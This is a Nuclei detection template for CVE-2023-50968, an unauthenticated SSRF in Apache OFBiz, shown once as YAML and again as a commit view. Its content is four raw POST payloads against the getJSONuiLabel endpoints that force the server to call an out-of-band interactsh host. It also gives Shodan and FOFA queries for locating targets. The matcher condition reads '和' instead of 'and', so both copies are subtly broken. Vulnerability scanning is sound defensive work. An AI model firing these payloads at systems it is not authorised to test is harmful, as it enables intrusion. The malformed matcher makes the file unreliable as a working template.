nuclei-templates/http/cves/2023/CVE-2023-50968.yaml

id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
  metadata:
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query: html:"OFBiz"
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2023,apache,ofbiz,ssrf

http:
  - raw:
      - |
        POST /partymgr/control/getJSONuiLabel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        requiredLabel={"http://{{interactsh-url}}/api":"{{randstr}}"}

      - |
        POST /partymgr/control/getJSONuiLabel HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        requiredLabels={"http://{{interactsh-url}}/api":"{{randstr}}"}

      - |
        POST /partymgr/control/getJSONuiLabelArray HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        requiredLabel={"http://{{interactsh-url}}/api":"{{randstr}}"}

      - |
        POST /partymgr/control/getJSONuiLabelArray HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        requiredLabels={"http://{{interactsh-url}}/api":"{{randstr}}"}

    stop-at-first-match: true
    matchers-condition: 和
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
Create CVE-2023-50968.yaml 2023-12-28 13:56:29 +00:00			`id: CVE-2023-50968`

			`info:`
			`name: Apache OFBiz < 18.12.11 - Server Side Request Forgery`
			`author: your3cho`
			`severity: high`
			`description: \|`
			`Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.`
			`reference:`
			`- https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q`
			`- http://www.openwall.com/lists/oss-security/2023/12/26/2`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-50968`
			`metadata:`
			`max-request: 4`
			`vendor: apache`
			`product: ofbiz`
			`shodan-query: html:"OFBiz"`
			`fofa-query: app="Apache_OFBiz"`
			`tags: cve,cve2023,apache,ofbiz,ssrf`

			`http:`
			`- raw:`
			`- \|`
			`POST /partymgr/control/getJSONuiLabel HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`requiredLabel={"http://{{interactsh-url}}/api":"{{randstr}}"}`

			`- \|`
			`POST /partymgr/control/getJSONuiLabel HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`requiredLabels={"http://{{interactsh-url}}/api":"{{randstr}}"}`

			`- \|`
			`POST /partymgr/control/getJSONuiLabelArray HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`requiredLabel={"http://{{interactsh-url}}/api":"{{randstr}}"}`

			`- \|`
			`POST /partymgr/control/getJSONuiLabelArray HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`requiredLabels={"http://{{interactsh-url}}/api":"{{randstr}}"}`

			`stop-at-first-match: true`
			`matchers-condition: 和`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`

			`- type: word`
			`part: header`
			`words:`
			`- 'OFBiz.Visitor='`